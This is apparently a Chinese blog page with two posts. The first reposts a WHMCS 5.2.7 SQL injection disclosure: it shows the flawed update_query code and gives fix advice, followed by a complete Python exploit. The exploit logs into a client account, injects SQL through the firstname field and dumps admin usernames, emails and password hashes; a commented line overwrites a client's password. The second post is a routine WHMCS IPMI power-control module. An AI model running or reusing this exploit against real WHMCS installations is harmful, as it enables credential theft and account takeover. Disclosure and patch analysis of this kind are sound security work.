2013-10-03
Whmcs 5.2.7爆SQL注入漏洞
localhost.re大牛在爆solusvm漏洞后沉寂了几个月又爆出了whmcs的SQL注入漏洞。 每篇文章还是依旧带一张搞笑的gif图片 漏洞文件 /includes/dbfunctions.php:<?php function update_query($table, $array, $where) { #[...] if (substr($value, 0, 11) == 'AES_ENCRYPT') { $query .= $value.','; continue; } #[...] $result = mysql_query($query, $whmcsmysql); } ?>(成因:凡是以 AES_ENCRYPT 开头的值,update_query() 都不加引号、不做转义就直接拼进 SQL 语句,而客户资料表单里的字段正是由用户提交的,所以可以被注入。修复方法是升级到官方发布的修复版本;自查时留意 tblclients 中 firstname 等资料字段是否被写入了异常内容,如有迹象应重置管理员和客户密码。)另外还附带了Python的EXP#!/usr/bin/env python # 2013/10/03 - WHMCS 5.2.7 SQL Injection # http://localhost.re/p/whmcs-527-vulnerabilityurl = 'http://clients.target.com/' # wopsie dopsie user_email = 'mysuper@hacker.account' # just create a dummie account at /register.php user_pwd = 'hacker'import urllib, re, sys from urllib2 import Request, urlopen ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"def exploit(sql): print "Doing stuff: %s" % sql r = urlopen(Request('%sclientarea.php?action=details' % url, data="token=%s&firstname=%s&lastname=1&companyname=1&email=%s&paymentmethod=none&billingcid=0&address1=1&address2=1&city=1&state=1&postcode=1&country=US&phonenumber=1&save=Save+Changes" % (user[1], 'AES_ENCRYPT(1,1), firstname=%s' % sql, user_email), headers={"User-agent": ua, "Cookie": user[0]})).read() return re.search(r'(id="firstname" value="(.*?)")', r).group(2)def login(): print "Getting CSRF token" r = urlopen(Request('%slogin.php' % url, headers={"User-agent": ua})) csrf = re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")', r.read()).group(2) cookie = r.info()['set-cookie'].split(';')[0] print "Logging in" r = urlopen(Request('%sdologin.php' % url, data="username=%s&password=%s&token=%s" %(user_email, user_pwd, csrf), headers={"User-agent": ua, "Cookie": cookie})).read() if 'dologin.php' in r: sys.exit('Unable to login') else: return [cookie, re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")', r).group(2)]user = login() print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)') # get admins print exploit('(SELECT * FROM (SELECT 
COUNT(id) FROM tblclients) as x)') # just get a count of clients# oh you want to be evil #exploit("'DISASTER', password=(SELECT * FROM (SELECT password FROM tblclients WHERE email='%s' LIMIT 1) as x)#" % user_email)原文地址:http://localhost.re/p/whmcs-527-vulnerability
2013年10月03日
2013-06-22
Whmcs IPMI模块
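yum install OpenIPMI OpenIPMI-tools
登陆whmcs后台》设置》产品/服务》相关产品》自定义字段》分别添加ipmiip/ipmiuser/ipmipass 类型为文本框的字段
下列代码保存路径modules/servers/ipmi/ipmi.php
<?php
//save as [whmcs]/modules/servers/ipmi/ipmi.php
//
// Helper names start with an underscore instead of the "ipmi_" module prefix so
// they are not mistaken for module entry points (NOTE(review): assumes WHMCS
// dispatches module functions by the "ipmi_" prefix; confirm for your version).

/**
 * Read the three IPMI custom fields from the WHMCS $params array.
 *
 * @param array $params Module parameters; only $params['customfields'] is read.
 * @return array array($ip, $user, $pass), each a string ('' when the field is missing).
 */
function _ipmi_fields($params)
{
    $fields = isset($params['customfields']) ? $params['customfields'] : array();
    $values = array();
    foreach (array('ipmiip', 'ipmiuser', 'ipmipass') as $key) {
        $values[] = isset($fields[$key]) ? (string) $fields[$key] : '';
    }
    return $values;
}

/**
 * HTML-escape a value before it is placed in markup or in an attribute.
 *
 * double_encode is off so values that arrive already entity-encoded are not
 * encoded a second time (presumably WHMCS may pre-encode stored input; verify).
 *
 * @param mixed $value
 * @return string
 */
function _ipmi_html($value)
{
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8', false);
}

/**
 * Build the ipmitool command line for one chassis power action.
 *
 * The host, user and password come from editable custom fields, so each one is
 * passed through escapeshellarg(); interpolating them raw into the string given
 * to exec() would let shell metacharacters in a field run arbitrary commands.
 * $action must be one of the fixed words used in this file, never user input.
 *
 * SECURITY: "-P" puts the BMC password on the command line, where other local
 * users can read it from the process list. ipmitool also accepts the password
 * from the IPMI_PASSWORD environment variable (-E) or from a file (-f); prefer
 * one of those on a shared host.
 *
 * @param array  $params Module parameters.
 * @param string $action "status", "reset", "off", "on" or "cycle".
 * @return string
 */
function _ipmi_command($params, $action)
{
    list($ip, $user, $pass) = _ipmi_fields($params);
    return 'ipmitool -H ' . escapeshellarg($ip)
        . ' -U ' . escapeshellarg($user)
        . ' -P ' . escapeshellarg($pass)
        . ' -I lanplus power ' . $action;
}

/**
 * Run a power action and report the result the way the callers below return it.
 *
 * The exit status decides success. exec() only returns stdout, so checking for
 * empty output (as this module did before) reports "success" whenever the error
 * text went to stderr; stderr is merged in here so it can be returned instead.
 *
 * @param array  $params Module parameters.
 * @param string $action Fixed action word, see _ipmi_command().
 * @return string "success", or the tool's output / exit status on failure.
 */
function _ipmi_power($params, $action)
{
    $lines = array();
    $status = 1;
    exec(_ipmi_command($params, $action) . ' 2>&1', $lines, $status);
    if ($status === 0) {
        return "success";
    }
    $message = trim(implode("\n", $lines));
    return $message !== '' ? $message : 'ipmitool exited with status ' . $status;
}

/**
 * Button label => action map shared by the client and admin areas.
 *
 * @return array
 */
function _ipmi_buttons()
{
    return array(
        "重启RESET" => "reboot",
        "电源重置POWER_CYCLE" => "cycle",
        "电源关闭POWER_OFF" => "off",
        "电源开启POWER_ON" => "on",
    );
}

/**
 * Client-area panel: power state, the IPMI credentials and a link to the BMC.
 *
 * Every interpolated value is HTML-escaped, including the text read back from
 * ipmitool. Note that this deliberately shows the IPMI password to the client.
 *
 * @param array $params Module parameters.
 * @return string HTML fragment.
 */
function ipmi_ClientArea($params)
{
    // Output can be returned like this, or defined via a clientarea.tpl ipmi file (see docs for more info)
    list($ipmiip, $ipmiuser, $ipmipass) = _ipmi_fields($params);
    // The status line is cut at offset 17, which skips a "Chassis Power is " prefix.
    $power = (string) substr((string) exec(_ipmi_command($params, 'status')), 17);
    $p = _ipmi_html("https://$ipmiip/");
    $code = "机器电源状态: " . _ipmi_html($power)
        . " 用户名:" . _ipmi_html($ipmiuser)
        . " 密码:" . _ipmi_html($ipmipass)
        . " <a href=\"$p\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color:#cc0000\">登陆到IPMI页面</a>";
    return $code;
}

/**
 * Admin-area link to the BMC web interface.
 *
 * @param array $params Module parameters.
 * @return string HTML fragment.
 */
function ipmi_AdminLink($params)
{
    list($ipmiip) = _ipmi_fields($params);
    $p = _ipmi_html("https://$ipmiip/");
    $code = "<a href=\"$p\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color:#cc0000\">登陆到IPMI页面</a>";
    return $code;
}

/** Hard reset ("power reset"). Returns "success" or an error string. */
function ipmi_reboot($params)
{
    return _ipmi_power($params, 'reset');
}

/** Power off. Returns "success" or an error string. */
function ipmi_off($params)
{
    return _ipmi_power($params, 'off');
}

/** Power on. Returns "success" or an error string. */
function ipmi_on($params)
{
    return _ipmi_power($params, 'on');
}

/**
 * Power cycle. Returns "success" or an error string.
 *
 * This action used to send the literal user name "user" and an undefined $pass
 * variable; it now uses the configured credentials like the other actions.
 */
function ipmi_cycle($params)
{
    return _ipmi_power($params, 'cycle');
}

/** Buttons offered in the client area. */
function ipmi_ClientAreaCustomButtonArray()
{
    $buttonarray = _ipmi_buttons();
    return $buttonarray;
}

/** Buttons offered in the admin area. */
function ipmi_AdminCustomButtonArray()
{
    $buttonarray = _ipmi_buttons();
    return $buttonarray;
}
?>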
2013年06月22日